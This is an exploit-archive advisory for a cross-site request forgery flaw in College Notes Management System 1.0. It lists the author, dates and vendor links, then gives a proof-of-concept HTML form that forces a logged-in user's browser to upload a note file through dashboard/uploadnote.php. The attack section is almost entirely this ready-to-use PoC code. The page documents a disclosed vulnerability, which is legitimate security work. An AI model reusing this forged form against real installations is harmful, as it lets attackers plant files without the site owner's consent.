College Notes Management System 1.0 Cross Site Request Forgery

2019.08.04

Credit: Mr Winst0n

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-352

# Exploit Title: College Notes Management System 1.0 - CSRF (Add Note)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan@gmail.com
# Discovery Date: August 3, 2019
# Vendor Homepage: https://anirbandutta.ml/
# Software Link: https://sourceforge.net/projects/college-notes-management/
# Software Link: https://github.com/anirbandutta9/College-Notes-Gallery
# Tested Version: 1.0
# Tested on: Parrot OS
# PoC:
<form role="form" action="http://localhost/[PATH]/dashboard/uploadnote.php" method="POST" enctype="multipart/form-data">
<div class="form-group">
<label for="post_title">Note Title</label>
<input type="text" name="title" class="form-control" placeholder="Eg: Php Tutorial File" value="" required="">
</div>
<div class="form-group">
<label for="post_tags">Short Note Description</label>
<input type="text" name="description" class="form-control" placeholder="Eg: Php Tutorial File includes basic php programming ...." value="" required="" "="">
</div>
<div class="form-group">
<label for="post_image">Select File</label><font color="brown"> (allowed file type: 'pdf','doc','ppt','txt','zip' | allowed maximum size: 30 mb ) </font>
<input type="file" name="file">
</div>
<button type="submit" name="upload" class="btn btn-primary" value="Upload Note">Upload Note</button><br><br>
</form>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

College Notes Management System 1.0 Cross Site Request Forgery

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.